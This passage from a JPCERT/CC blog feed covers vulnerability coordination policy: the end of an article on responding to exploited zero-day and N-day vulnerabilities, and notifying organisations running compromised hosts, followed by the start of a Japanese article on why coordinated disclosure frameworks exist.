multiple vulnerabilities (it cannot be ruled out that multiple vulnerabilities in the same product are being chained, or that vulnerabilities in multiple products are being exploited within the same attack campaign), so from the perspective of responding to the attack campaign, the investigation results of the affected sites and the vendor need to be linked with each other.<br>JPCERT/CC's role as a coordinating body is not merely that of a "liaison" but also that of a "coordinator" and "verifier" so that this exchange and verification of information can proceed smoothly.</p> <p></p> <figure class="mt-figure mt-figure-center"><a href="https://blogs.jpcert.or.jp/ja/.assets/%E5%9B%B3_%E9%96%A2%E4%BF%82%E8%80%85%E9%96%93%E3%81%A7%E8%A1%8C%E3%82%8F%E3%82%8C%E3%82%8B%E8%84%86%E5%BC%B1%E6%80%A7%E6%82%AA%E7%94%A8%E3%81%AB%E9%96%A2%E3%81%99%E3%82%8B%E6%A4%9C%E8%A8%BC%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AE%E5%90%84%E5%88%A4-81694d.png" class="mt-asset-link"><img class="asset asset-image at-xid-3881660 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E5%9B%B3_%E9%96%A2%E4%BF%82%E8%80%85%E9%96%93%E3%81%A7%E8%A1%8C%E3%82%8F%E3%82%8C%E3%82%8B%E8%84%86%E5%BC%B1%E6%80%A7%E6%82%AA%E7%94%A8%E3%81%AB%E9%96%A2%E3%81%99%E3%82%8B%E6%A4%9C%E8%A8%BC%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AE%E5%90%84%E5%88%A4-81694d-640wri.png" alt="" width="640" height="360"></a> <figcaption>Figure 3: Verification of vulnerability exploitation carried out between the discoverer, the coordinating body, and the product developer (and the decision factors for it)</figcaption> </figure> <p></p> 
<p><br><strong>〇Finding and supporting other organizations hit by the zero-day attack</strong><br>Separately from vulnerability coordination, indicator information is disseminated as incident response support/information-sharing activities in order to identify affected organizations that have not yet recognized the damage. If the attack campaign is still ongoing and urgent, the vulnerability publication and security alert are issued promptly as soon as a fix or similar is ready, and IoC information and methods for investigating compromise are disclosed at that time, which may take the place of this phase.<br>Also, in the case of enterprise products, the product developer can sometimes contact/support its customers, so affected customers are often notified in advance before the vulnerability publication. Precedents are mostly with overseas products, but there are cases where the product developer can identify and notify customers suspected of compromise through product telemetry, remote support, and so on, and this is sometimes done before the vulnerability publication or security alert.</p> <p>By combining these various channels of communication, namely information sharing, security alerts, individual notification of affected organizations, and contact from the product developer, we work toward early detection of damage and prevention of its spread. How these means are combined, their order, and their timing are decided case by case according to the status of the attack activity (whether the attack campaign is ongoing or over), the progress of fix preparation, the scope of impact (scope of damage), and so on. There is no particular guideline or manual; coordination is carried out flexibly from the perspective of responding to the attack campaign.</p> <p></p> <h5>&lt;Case B: Zero-day incident in an overseas product; Case C: N-day incident in an overseas product&gt;</h5> <p>When exploitation damage from an overseas product's vulnerability is discovered first outside Japan, particularly for vulnerabilities whose impact spreads globally, in many cases, though not all, the specialist organizations, security vendors, and vendors that responded in that country share information with other countries in advance, and prior coordination is carried out so that security alerts are issued in each country at the same time as the vulnerability publication.</p> <p>Although there are almost no such cases, when exploitation damage from an overseas product's vulnerability is discovered first in Japan, the discoverer contacts the overseas vendor directly, via JPCERT/CC, or with JPCERT/CC copied.</p> <p></p> <p><strong>〇Responding to changes in threat trends</strong><br>Previously, the typical response was: "the vulnerability was exploited in the past (a zero-day attack), and the attack campaign has already ended at the time of the vulnerability publication, but a security alert is issued because the likelihood of exploitation by other actors is high."<br>On the other hand, cases that have been increasing in the past few years include "(X) attack campaigns that continue even after a security alert is issued" and "(Y) N-day attacks that begin immediately after the vulnerability publication" (lower part of Figure 4).<br>Pattern (X), to be precise, comes in two types:</p> <p style="padding-left: 40px;">(X-1) cases where exploitation was discovered early and the vulnerability publication and security alert could be issued during the attack campaign<br>(X-2) cases where attack activity continues even after the zero-day attack is discovered and the vulnerability is published</p> <p>For the former, we surmise that the background is that wide-ranging attacks by so-called IAB-like actors<a href="#fn2">[2]</a> increase the likelihood of early discovery. The latter are also mostly cases of exploitation by IAB-like actors; for example, in the case of the "Ivanti Connect Secure and Ivanti Policy Secure vulnerabilities (CVE-2023-46805 and CVE-2024-21887)"<a href="#fn3">[3]</a> in January 2024, it was confirmed<a href="#fn4">[4]</a> that UNC5221, in addition to the preceding zero-day attacks (December 2023), continued attack activity immediately after the vulnerability publication and security alert.</p> 
<p>In cases where such IAB-like actors carry out zero-day/N-day attacks, because tactics such as placing webshells on network appliances/edge devices are favored, it is often possible to identify compromised hosts externally. For this reason, after an attack is discovered, many security vendors/researchers conduct scanning surveys, and "information on already-compromised hosts" is shared among international organizations and others.<br>There are cases where JPCERT/CC conducts the survey itself, but using such information provided from overseas, we carry out notification operations to the organizations managing/using already-compromised hosts in parallel with security alerts and information sharing.<br>As a slight digression, such scan information sometimes circulates as public information through reports and social media, but in practice some of it is inaccurate about whether the host was actually running an affected version, so we also scrutinize this information.</p> <figure class="mt-figure mt-figure-center"><a href="https://blogs.jpcert.or.jp/ja/.assets/%E5%9B%B3_%E4%B8%BB%E3%81%AB%E6%B5%B7%E5%A4%96%E8%A3%BD%E5%93%81%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7%E6%82%AA%E7%94%A8%E7%99%BA%E7%94%9F%E6%99%82%E3%81%AE%E3%82%BF%E3%82%A4%E3%83%A0%E3%83%A9%E3%82%A4%E3%83%B3.png" class="mt-asset-link"><img class="asset asset-image at-xid-3881661 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E5%9B%B3_%E4%B8%BB%E3%81%AB%E6%B5%B7%E5%A4%96%E8%A3%BD%E5%93%81%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7%E6%82%AA%E7%94%A8%E7%99%BA%E7%94%9F%E6%99%82%E3%81%AE%E3%82%BF%E3%82%A4%E3%83%A0%E3%83%A9%E3%82%A4%E3%83%B3-800wri.png" alt="" width="800" height="559"></a> <figcaption>Figure 4: Timeline of the response when a vulnerability is exploited (mainly for overseas products)</figcaption> </figure> <p></p> <p><strong>〇Conducting notification operations (especially in Case C)</strong><br>In addition to individual notification of organizations managing hosts that have been externally confirmed as already compromised, as described above, we sometimes also carry out notification operations to organizations managing hosts that remain vulnerable even after the vulnerability publication/security alert.<br>In particular, in cases where an exploit or PoC has been published and the vulnerability can be exploited by a wide range of unspecified actors, or where IAB-like actors may continue to conduct attack campaigns as described above, we carry out notification operations to organizations managing hosts that are vulnerable but not yet compromised.</p> <p>We do not notify organizations managing hosts that remain vulnerable in every case. This is because we believe that, fundamentally, vulnerability response should primarily consist of communication from product developers and others to users and remediation of the vulnerability, and that users (or organizations entrusted by them) should themselves manage their devices and keep track of vulnerability information.<br>On the other hand, as we have discussed in previous blog posts, there are problems<a href="#fn5">[5]</a> with the distribution of vulnerability information through the market/distribution channels, and the reality is that in situations where the likelihood of attack is rising, or an attack campaign is already underway, as described above, we have no choice but to carry out notification operations.</p> <p></p> <h4>&nbsp;</h4> <h4>Future Challenges</h4> <hr> 
<p>So far we have introduced JPCERT/CC's current operations against vulnerability exploitation, but there are various challenges, and moves to improve the vulnerability response framework and capabilities may emerge in the future.<br>The "Recommendations for Improving Response Capabilities in the Field of Cyber Security" (hereinafter "the Recommendations")<a href="#fn6">[6]</a>, published last November by the Expert Panel on Improving Response Capabilities in the Field of Cyber Security, make several references to vulnerability response and to information dissemination such as security alerts. Focusing on the recommendations taken up by the expert panel, we briefly consider the current operational challenges and future points at issue.</p> <h5><br>&lt;On "one voice" for highly urgent information dissemination&gt;</h5> <table style="border-collapse: collapse; width: 100%;" border="1"><colgroup><col style="width: 99.9123%;"></colgroup> <tbody> <tr> <td>(omitted) Currently, in addition to the National center of Incident readiness and Strategy for Cybersecurity (NISC), the police, the Ministry of Economy, Trade and Industry, JPCERT/CC, the Information-technology Promotion Agency, and others each disseminate information individually, but particularly highly urgent information dissemination should be done with one voice so that no discrepancies arise between agencies. (Recommendations, page 3)</td> </tr> </tbody> </table> <p>Currently, each agency disseminates its own information (while also making use of information from JPCERT/CC), and there are not a few cases where the decision whether or not to issue a security alert for the same vulnerability differs between agencies. Fragmented, uncoordinated information dissemination with differences in "tone" and technical content must be improved; on the other hand, the following points can be raised as issues with "one voice".</p> <p style="padding-left: 40px;"><strong>〇The problem of speed</strong><br>As mentioned above, for exploitation cases involving vulnerabilities with a wide scope of impact, particularly in overseas products, we issue security alerts within one day of publication<a href="#fn7">[7]</a>. If, for example, a multi-agency review process were introduced at the stage of considering a security alert, speed could drop, and where the agencies' positions differ, there is a risk that somewhat watered-down content would be adopted as the disseminated information.</p> <p style="padding-left: 40px;"><strong>〇The merits of multiple agencies disseminating and responding</strong><br>While some alignment of disseminated information is necessary, it is not necessarily required that there be only one disseminating organization. "One voice" is not necessarily synonymous with consolidating the responding organizations into one. In the field of public administration, for example, it has been pointed out<a href="#fn8">[8]</a> that redundancy among multiple agencies suppresses the occurrence of errors and increases adaptability to environmental change. Also, under the current structure, the reach of each agency's disseminated information and support differs, and although there is the problem of eliminating the recipient burden caused by duplication, from the viewpoint of redundancy this can also be interpreted as a multilayered response structure.</p> <h5>&lt;On the handling of exploitation information&gt;</h5> <table style="border-collapse: collapse; width: 100%;" border="1"><colgroup><col style="width: 99.9123%;"></colgroup> <tbody> <tr> <td>With many vulnerabilities published every year, so that users can identify which of the vast amount of vulnerability information should be addressed with priority, the government should, with reference to the "Known Exploited Vulnerabilities Catalog" published by the U.S. government, disseminate information on vulnerabilities exploited in Japan in a centralized and easily understandable manner. (Recommendations, page 3)</td> </tr> </tbody> </table> <p style="padding-left: 40px;"><strong>〇Unclear "tone"</strong><br>The current KEV indicates whether a vulnerability has been exploited by ransomware actors, but it does not indicate when that exploitation occurred, whether an attack campaign is currently ongoing, or whether there is a likelihood of future exploitation. Nor is it linked to security vendors' analysis reports as evidence of exploitation.</p> <p style="padding-left: 40px;"><strong>〇Insufficient awareness of the domestic framework's initiatives</strong><br>In the Information Security Early Warning Partnership, based on the results of the FY2023 deliberations of the "Study Group on the Handling of Vulnerability Information in Information Systems", provisions on the handling of information indicating exploitation were newly established, and the related public notice was revised<a href="#fn9">[9]</a>. Operation has already begun in FY2024, and for domestic products listed on JVN, cases where information on whether they have been exploited is posted are gradually increasing. The expert panel did not mention the operation of this framework, but we believe the first task is to strengthen awareness of it.</p> <h5>&lt;On scanning and notification operations&gt;</h5> <table style="border-collapse: collapse; width: 100%;" border="1"><colgroup><col style="width: 99.9123%;"></colgroup> <tbody> <tr> <td>Identifying vulnerabilities through external scanning and issuing alerts is also considered effective, but it should be borne in mind that if the accuracy is low, it becomes an excessive burden on the organizations targeted by the alerts. (Recommendations, page 4)</td> </tr> </tbody> </table> <p>The cost burden on the receiving organizations of security alerts is as explained in the earlier blog post introduced above<a href="#fn10">[10]</a>, and notification operations have the same problem. Notifications are not carried out only by JPCERT/CC; many "notifications" are made in Japan and overseas, by individuals as well as organizations. Frequently seen problems include cases where the basis (technical evidence) for the judgment that a host has been compromised is unclear, and "one-way" notifications where the method for investigating the compromise and the information needed for the investigation (such as timestamps) are not provided/supported.<br>In particular, in cases where an organization/individual that did not itself observe and respond to the attack campaign in question learns of the method for investigating compromise and conducts scanning surveys and notifications, the information provided to the notified organizations is sometimes limited or the support insufficient. The same problems are often seen in notification activities by organizations that merely relay such discoverers'/investigators' information.</p> <p>※Unfortunately, even in the many notification operations JPCERT/CC carries out, there are cases where, for various reasons, we must admit we could not fully provide the technical information needed for the investigation. Please feel free to send us your opinions and complaints at any time.</p> <h5>&lt;On the problem of only disseminating information&gt;</h5> <p>Although not mentioned in the expert panel's recommendations, there are also challenges regarding what happens "after" information dissemination. As explained in the first half of this article, when JPCERT/CC issues security alerts, shares information, or carries out notification operations, in addition to providing the information needed to investigate whether a compromise has occurred, we also handle incident consultations from organizations where suspected compromise has been found. As also discussed in this article, in the vulnerability exploitation incidents involving network appliances/edge devices that have increased in the past few years, forensic investigation of the compromised devices is a challenge. While IAB-like actors attack a wide range of devices internationally, for many products the operations and maintenance vendor cannot conduct a detailed investigation, so investigation requests flood the vendor and prompt answers often cannot be obtained. Furthermore, in such attacks there are many cases where the investigation of whether lateral movement occurred after the device was compromised is insufficient, so support is needed not just to issue a security alert and be done, but for the subsequent investigation as well.<br>At present, not all agencies that disseminate information have the capability and resources to conduct such investigations for every product, which results in unevenness in the response of the country as a whole.</p> <h5>&lt;On the handling of pre-publication vulnerability information/exploitation information&gt;</h5> <p>This is another point not touched on in the expert panel's recommendations. Under the current domestic framework, information on the details of an unpublished vulnerability is handled only among a very limited set of parties (IPA, JPCERT/CC, the vendor, and the discoverer). There are exceptions: since 2017, prioritized pre-publication provision of information ("priority information provision")<a href="#fn11">[11]</a> to the government and some critical infrastructure operators has been in place.<br>As for such "prioritized (pre-publication) information provision", although not institutional in the way Japan's is, overseas there is, for example, Microsoft's MAPP (Microsoft Active Protections Program)<a href="#fn12">[12]</a>, under which Microsoft provides pre-publication vulnerability information to vendors and others.<br>On the other hand, such pre-publication advance information provision has also given rise to trouble<a href="#fn13">[13]</a> involving suspected pre-publication information leaks. Under the current domestic framework, because the recipients of priority information provision are limited at present and detailed information is handled within the coordination phase (basically exchanges among the discoverer, JPCERT/CC, and the vendor), even though it is a handling framework without penalty provisions, the structure makes it relatively easy to identify the organization responsible should inappropriate handling occur. On the other hand, as JPCERT/CC expressed in its opinion<a href="#fn14">[14]</a> at the FY2023 "Study Group on the Handling of Vulnerability Information in Information Systems", vendors have voiced concerns about expanding priority information provision, and if the number of players handling pre-publication vulnerability information increases in the future, further discussion of measures against information leaks will be necessary.</p> <h4>&nbsp;</h4> <h4>Conclusion</h4> <hr> <p>Japan is unusual in the world in that vulnerability information has been handled through public-private cooperation under a public framework. Overseas, coordination has basically been carried out directly and individually between discoverers and vendors, and as a result, trouble such as unintended information disclosure has occurred repeatedly. On the other hand, within the scope visible to JPCERT/CC through its daily international cooperation, the circulation of information on vulnerability exploitation overseas appears to be increasing day by day. We believe that the players who come into contact with exploitation information, while having experienced various failures in handling vulnerability information, are gradually forming a shared sense of norms and beginning to align of their own accord.</p> <p>In Japan, under the vulnerability public notice framework, the players who circulate information, particularly on pre-publication vulnerability exploitation, have in a sense been limited, but going forward, the number of players who come into contact with/disseminate vulnerability exploitation information is expected to increase.<br>This May, the so-called Cyber Response Capability Enhancement Act and its accompanying legislation were enacted; Article 42 of the Enhancement Act provides for "requesting that necessary measures be taken to prevent damage from cyber attacks" of vendors and others of products with vulnerabilities, and Article 7 of the amended Basic Act on Cybersecurity added a duty provision (to strive for design and development that ensures users' cybersecurity, continuous provision of information, and so on)<a href="#fn15">[15]</a>. As the roles of government agencies and vendors expand, we would like to actively contribute JPCERT/CC's accumulated knowledge to future discussions on not just vulnerability publication but on how exploitation information should be handled, and on at what timing and by what means the technical information users need for investigation should be provided.</p> <p></p> <h4>&nbsp;</h4> <h4>References</h4> <p><a name="fn1"></a>[1] Ministry of Economy, Trade and Industry, "Framework for Handling Vulnerability-Related Information" https://www.meti.go.jp/policy/netsecurity/vulinfo.html</p> <p><a name="fn2"></a>[2] IABs have been treated as one category of so-called crime actors, but in recent years there have been more cases of division of labor in APT campaigns, and there are moves to define "IAB-like" actors in APT campaigns. Cisco Talos, "Redefining IABs: Impacts of compartmentalization on threat tracking and modeling", https://blog.talosintelligence.com/redefining-initial-access-brokers/</p> <p><a name="fn3"></a>[3] 2024/1/11 JPCERT/CC, "Security Alert on Ivanti Connect Secure and Ivanti Policy Secure vulnerabilities (CVE-2023-46805 and CVE-2024-21887)" https://www.jpcert.or.jp/at/2024/at240002.html</p> <p><a name="fn4"></a>[4] 2024/4/5 Google/Mandiant, "Cutting Edge, Part 4: Ivanti Connect Secure VPN Post-Exploitation Lateral Movement Case Studies", https://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement?hl=en</p> <p><a name="fn5"></a>[5] JPCERT/CC Eyes, "Why are vulnerabilities in SSL-VPN products left unaddressed? On the causes of attacks overlooked behind the term 'supply chain attack'" https://blogs.jpcert.or.jp/ja/2022/07/ssl-vpn.html</p> <p><a name="fn6"></a>[6] https://www.cas.go.jp/jp/seisaku/cyber_anzen_hosyo/koujou_teigen/teigen.pdf</p> <p><a name="fn7"></a>[7] There are also cases where information is shared before publication, around the time of coordination between overseas agencies and the vendor.</p> <p><a name="fn8"></a>[8] 鈴木潔, "Inter-organizational Cooperation in Administrative Measures to Prevent COVID-19 Infection: Redundancy, Inter-agency Cooperation, and Leadership" (in 年報行政研究 (Annals of the Japanese Society for Public Administration) 57, "Redundancy in Public Administration")</p> <p><a name="fn9"></a>[9] https://www.ipa.go.jp/security/guide/vuln/partnership_guide.html</p> <p><a name="fn10"></a>[10] JPCERT/CC Eyes: On the problem of the recipient-side "cost" of security alerts and information-sharing activities: so that information dissemination does not become a self-serving act done as an alibi or for the sake of results<br>https://blogs.jpcert.or.jp/ja/2023/05/cost-and-effectiveness-of-alerts.html</p> <p><a name="fn11"></a>[11] For priority information provision, please refer to the Information Security Early Warning Partnership Guidelines.<br>https://www.ipa.go.jp/security/guide/vuln/ug65p90000019by0-att/partnership_guideline.pdf<br>The history of past deliberations can also be found in the past reports of the "Study Group on the Handling of Vulnerability Information in Information Systems" published on IPA's website. https://www.ipa.go.jp/security/guide/vuln/partnership_guide.html</p> <p><a name="fn12"></a>[12] https://www.microsoft.com/en-us/msrc/mapp</p> <p><a name="fn13"></a>[13] Bloomberg reported that, regarding the Microsoft SharePoint vulnerabilities (CVE-2025-53770 and others) whose zero-day exploitation was discovered and published in July 2025, it has been pointed out that information may have leaked in advance via MAPP. The conclusion of this matter is still unknown at present, but the Wall Street Journal reported a similar allegation regarding the 2021 Microsoft Exchange Server vulnerabilities (so-called Proxyshell).</p> <p><a name="fn14"></a>[14] "Study Group on the Handling of Vulnerability Information in Information Systems", FY2023 report, page 33 https://www.ipa.go.jp/security/reports/vuln/nq6ept000000ldxx-att/report2023.pdf</p> <p><a name="fn15"></a>[15] https://www.cyber.go.jp/pdf/council/cs/dai43/43shiryou4.pdf</p>
  43. Commentary: Operation of the Vulnerability-Related Information Handling Framework and Future Challenges (Part 1) ~ What Is Vulnerability Disclosure in the Public Interest? ~

    Fri, 12 Sep 2025 04:30:00 -0000

    ※The vulnerability-related information handling framework is operated together with the Ministry of Economy, Trade and Industry and IPA, but this article...
    <p><strong>※脆弱性関連情報取扱制度は経済産業省およびIPAとともに運用していますが、本稿はJPCERT/CCとして執筆したものです。</strong></p> <p>日本では、「情報セキュリティ早期警戒パートナーシップ」<a href="#fn1">[1]</a><a href="#fn2">[2]</a>に基づく運用を20年以上行ってきた実績があり、各国に先んじて、いわゆる「協調された脆弱性開示(CVD)」への取り組みが官民連携で行われてきました。しかし、残念ながら、制度運用への理解が十分に広まっていないことを示すような出来事が度々発生しています。単に法律やガイドラインに書いてあることを解釈するだけでなく、「なぜこの仕組みは存在するのか/必要とされているのか」を考察しなければ、制度(や制度の維持)という「手段」が自己目的化し、形骸化、あるいは硬直化し実態にそぐわなくなる恐れがあります。&nbsp;</p> <p>多くの発見者、製品開発者が脆弱性調整に関わるようになったとはいえ、社会/業界全体からすると、多くの組織/人にその対応経験が十分にあるわけではありません。インシデント対応と同様に、公表される内容、経緯は一部であり、その調整過程や詳細は限られた関係者にしか知られない世界です。本稿では、制度上の「調整機関」として、また、悪用時のインシデント対応支援を行うJPCERT/CCの観点から、対応現場側の課題と今後について考察してみたいと考えています。「前編」では、まだ悪用の蓋然性がない、“平時”の脆弱性調整について解説し、後編では脆弱性が悪用される蓋然性が高まっている、あるいはすでに悪用された場合の各種オペレーションについてご紹介したいと思います。</p> <p>なお、脆弱性関連情報の取扱いを巡る法的な観点でのさまざまな論点の整理については、高橋郁夫弁護士らによる「情報システム等の脆弱性情報の取扱いにおける法律面の調査 報告書改訂版」<a href="#fn3">[3]</a>がIPAのWebサイトで公開されていますので、まずはこちらをご参照ください。</p> <h4>&nbsp;</h4> <h4>平時の対応について</h4> <p>前述のとおり、日本では「情報セキュリティ早期警戒パートナーシップ」制度に基づき、各国に先んじて、いわゆる「協調された脆弱性開示(CVD)」への取り組みが官民連携で行われてきました。</p> <p>海外においては、基本的に発見者―メーカー間で直接/個別の調整が行われてきた結果、意図しない情報開示などのトラブルが度々起きてきました。「メーカーが脆弱性であると認めないから情報開示する」「公益性が高いと判断し公表する」といった主張にて、両者の協調に依らない情報開示が度々行われてきました。あるいは、発見者が脆弱性について指摘していたにも関わらずメーカー側から誠実な対応が得られなかったというトラブルも度々起きてきました。他方で、最近では国としてCVDを推進したり、メーカーとして対応方針を宣言する組織も増え、また、脆弱性情報に触れるプレーヤーがこれまでのさまざまな脆弱性情報ハンドリングの失敗を経験しながらも徐々に相場観を形成し、自発的に足並みを揃えつつある状況です。</p> <p>脆弱性情報というものは、メーカーにとってはネガティブな情報であり、一方で発見者にとってはその活動成果や能力を示すポジティブな情報です。ユーザーにとっては、問題が解消されるポジティブな情報ですが、コントロールされない情報開示が悪用につながればネガティブな情報となります。そうした中で、日本の脆弱性情報の取り扱い制度においては、調整後のメーカーからの公表を基本とし、また、公表時(JVN掲載)には発見者を明記することができるようになっています。JVNという場を使い、メーカーとしての情報開示、発見者としての情報開示がスムーズに連動できるようになっているのです。<br>以前のブログ記事<a href="#fn4">[4]</a>でも解説したとおり、こうした仕組みは、情報を効率よく活用し、どこか一個人/一組織だけのために“消費”され、他者の不利益が発生するような、負の外部性を可能な限り避けるための仕組みと言えます。</p> <h4>&nbsp;</h4> <h4>調整制度はなぜ存在するのか</h4> 
<p>脆弱性を悪用する攻撃者と悪用された製品のメーカーとの関係は「加害者」と「被害者」の関係になりますが、他方で、脆弱性の発見者とメーカーとの関係はそうではありません。こうした、「加害者」「被害者」だけの図式で捉えられない利害の衝突へのアプローチとして、経済学や法学の分野では「コースの定理」という考え方が用いられることがあります。当事者間の私的な取り引きを通じて「最も効率的な結果が達成される」という定理を、コースの定理といいます。</p> <table style="border-collapse: collapse; width: 100%;" border="1"><colgroup><col style="width: 99.9123%;"></colgroup> <tbody> <tr> <td> <p>取引費用が十分に小さいとき、権利の境界や所在が明確で、約束が強制されるのであれば、法的ルールが権利をどのように割り当てるとしても、最終的な資源配分は変わらない(当事者の私的な取引を通じて、最も効率的な結果が達成される)</p> <p style="padding-left: 440px;">(出典:飯田高『法と社会科学をつなぐ』(有斐閣)136ページ)</p> </td> </tr> </tbody> </table> <p>※ちなみに、本来、コースの定理は公害などの外部不経済に対して、当事者間で調整・解説するための考え方として使われるものであり、脆弱性の発見者とメーカーとの関係では厳密には外部不経済とは言えませんが、その解決アプローチは援用できると考え、引用しています。</p> <p>取引費用というのは「取引を行う際に生じる費用の総称であり、取引の相手方を探す費用、交渉の実施や合意書作成の費用、履行の監視や違反に対する制裁の費用、戦略的行動に伴う費用」<a href="#fn5">[5]</a>というもので、これを脆弱性調整の作業に当てはめると、</p> <p style="padding-left: 40px;">「取引の相手方を探す費用→メーカーの適切な交渉窓口を探すコスト」<br>「交渉の実施や合意書作成の費用→発見者の主張とメーカー側の主張の着地点を探す(検証)作業」<br>「履行の監視や違反に対する制裁の費用→公表までの進捗管理」<br>「戦略的行動に伴う費用→発見者の目的(カンファレンス発表、自社能力のアピール、公益目的等)とメーカーの戦略(レピュテーションダメージの最小化)との間の調整」</p> <p>といったところになるかと思います。コースの定理は脆弱性調整のように多くの取引費用が発生する場合では「何らかのルールや制度が必要」であることを示唆する理論ともいえます。調整制度がなく、発見者―メーカー間で交渉を行う場合、あらゆる取引費用をお互いが負担することになるわけですが、両者間にはもともと信頼関係がなく(むしろ、最初から主張や利害が衝突していることがある)、さらに脆弱性やセキュリティ技術への知見や情報にも非対称性(メーカーが必ずしもセキュリティに詳しくない場合もあれば、発見者が当該製品について技術的に詳しくないこともある)があります。あまりにも取引コストが高すぎるため、調整が難航し、取引コストを負担せずに個別の目的(例:脆弱性を知らしめること)を達成(例:合意に至らない一方的情報開示)しようとする動きが出てしまうわけです。</p> <p>脆弱性情報の取り扱い制度は、あらかじめ取扱いルールを示し、調整役を設けることで、こうした双方の取引コスト負担を減らし、交渉を効率よく進めるための制度だと考えることができます。初めて脆弱性を発見する発見者/修正対応するメーカーにとってだけでなく、何度もこうした制度を使うプレーヤーにとっても、制度を使うほど取引費用を減らし、効率化を進めることができるというメリットもあります。</p> <p></p> <figure class="mt-figure mt-figure-center"><a href="https://blogs.jpcert.or.jp/ja/.assets/%E5%9B%B31_%E8%84%86%E5%BC%B1%E6%80%A7%E6%83%85%E5%A0%B1%E9%96%8B%E7%A4%BA%E3%81%AB%E3%81%8A%E3%81%91%E3%82%8B%E8%AA%BF%E6%95%B4%E5%88%B6%E5%BA%A6%E3%81%AE%E6%84%8F%E5%91%B3.png" class="mt-asset-link"><img class="asset asset-image at-xid-3861096 
mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E5%9B%B31_%E8%84%86%E5%BC%B1%E6%80%A7%E6%83%85%E5%A0%B1%E9%96%8B%E7%A4%BA%E3%81%AB%E3%81%8A%E3%81%91%E3%82%8B%E8%AA%BF%E6%95%B4%E5%88%B6%E5%BA%A6%E3%81%AE%E6%84%8F%E5%91%B3-800wri.png" alt="" width="800" height="350"></a> <figcaption>図1_脆弱性情報開示における調整制度の意味</figcaption> </figure> <p></p> <h4>&nbsp;</h4> <h4>「脆弱性の存在を示せば」それで対策は進むのか</h4> <p>「脆弱性の存在を明らかにして注意喚起をする」ということであれば、制度以前、あるいはかつての海外側がそうだったように、各自がそれぞれの判断の基で情報開示をすることが「最短ルート」に思えます。問題は、「では、どうやって修正するのか」という観点です。<br>コンシューマー製品の脆弱性対応の多くでは、公表と同時に修正プログラムの配布を行い、メーカーからの公表等を通じてユーザーに適応を呼びかけるケースが大半です。<br>他方で、法人向け製品では、修正プログラムや暫定的な回避策/被害軽減策の提供を先んじてユーザー組織に個別通知し、ある程度リスクを低減したところで公表を行うというケースがよく行われています。<br>これは、「コンシューマーよりも法人向け製品の方が確実にコミュニケーションできる手段があるから」<a href="#fn6">[6]</a>という実務的な背景もありますが、そうしたユーザーの対象製品が侵害されることで、さらにそのユーザー法人の顧客/ステークホルダーなどに影響が出ることが想定されるため、万が一公表後に悪用する攻撃が発生した場合に備えて、暫定的な対応を先んじて行っておきたいという考え方があるからです。<br>また、法人向けの製品の場合、修正プログラムを瞬時に適用できるケースは少なく、顧客やステークホルダーに影響がある場合、システム停止や修正前のパッチテスト等、多くの工程/リソース投入/コストが発生することから、本格的/根本的な修正を行うまでの暫定的措置が極めて重要です。</p> <p>一方で、ここまではあくまで「平時」の想定です。悪用がすでに発生している場合、あるいは悪用される蓋然性が高まっている場合はまた異なったタイムラインでの動きが必要になりますが、これは後編で解説したいと思います。</p> <p></p> <figure class="mt-figure mt-figure-center"><a href="https://blogs.jpcert.or.jp/ja/.assets/%E5%9B%B32_%E4%BF%AE%E6%AD%A3%E5%AF%BE%E5%BF%9C%E3%81%AB%E5%BF%85%E8%A6%81%E3%81%AA%E6%9C%9F%E9%96%93.png" class="mt-asset-link"><img class="asset asset-image at-xid-3861097 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E5%9B%B32_%E4%BF%AE%E6%AD%A3%E5%AF%BE%E5%BF%9C%E3%81%AB%E5%BF%85%E8%A6%81%E3%81%AA%E6%9C%9F%E9%96%93-800wri.png" alt="" width="800" height="390"></a> <figcaption>図2_修正対応に必要な期間</figcaption> </figure> <p></p> <h4>&nbsp;</h4> <h4>脆弱性公表による「価値の総量」</h4> 
<p>脆弱性調整について、基本的に発見者もメーカーも「開示」するという目的ではベクトルが一致しています。ただ、問題になるのはその(期待する)「タイミング」が異なるという点です。<br>本来、お互いが望んだ公表タイミングがあり、これがズレた分だけ、片方側の不利益になります(図3のとおり)。前述のとおり、修正作業にはメーカー内でもまたユーザーサイドでも相当の期間を必要とすることが多いため、基本的にメーカーが希望する公表タイミングというものは発見者が望む公表タイミングよりは時間軸的に後ろになりがちです。他方で、発見者側にも事情<a href="#fn7">[7]</a>はあり、例えば、国際カンファレンスでの発表を予定している場合などがあります(※しつこいですが、悪用の蓋然性が高まっている、あるいはすでに悪用が発生している場合は事情が異なります。後編で解説します)。この調整もまた、前述のとおり、取引コストがかかるため、調整制度を用いて、この取引コストを減らし、お互いの妥協点となる公表タイミングを調整するわけです。</p> <p>こうした調整は、発見者、メーカーの「二者それぞれの利益」だけを調整するというものではないことに注意が必要です。脆弱性が適切に開示されなければ、悪用等を惹起したり、メーカーもさることながら、製品のユーザー側で本来の修正タイミング・リソースが大きく変化することでのコスト負担、経済的損失など、ユーザーや社会インフラ全体が不利益を被ったりする可能性があるわけです。前述のコースの定理が示すのは「価値の総量」をどう分配できるかという観点であり、脆弱性情報の取り扱い制度もまた、社会全体としての脆弱性開示による利益を得るための制度であると考えることができます。<br>脆弱性情報開示の議論において、よく「公益性」という用語が使われているのを散見しますが、二者間の直接交渉がどうしても「二者間の利益の調整」に陥りがちです。ここまでに述べたとおり、社会全体での「価値の総量」を調整するためには、効率的な調整ができる、脆弱性告示制度に基づいた調整が望ましいと筆者は考えます。</p> <p>前項に同じく、ここまでの整理はあくまで悪用がまだ確認されておらず、また、悪用の蓋然性も高まっていない状態での「平時」での整理です。悪用がすでに発生している、または差し迫った脅威があるという場合はまた異なった判断軸が必要になるわけですが、こちらも後編で解説したいと思います。</p> <p></p> <p></p> <figure class="mt-figure mt-figure-center"><a 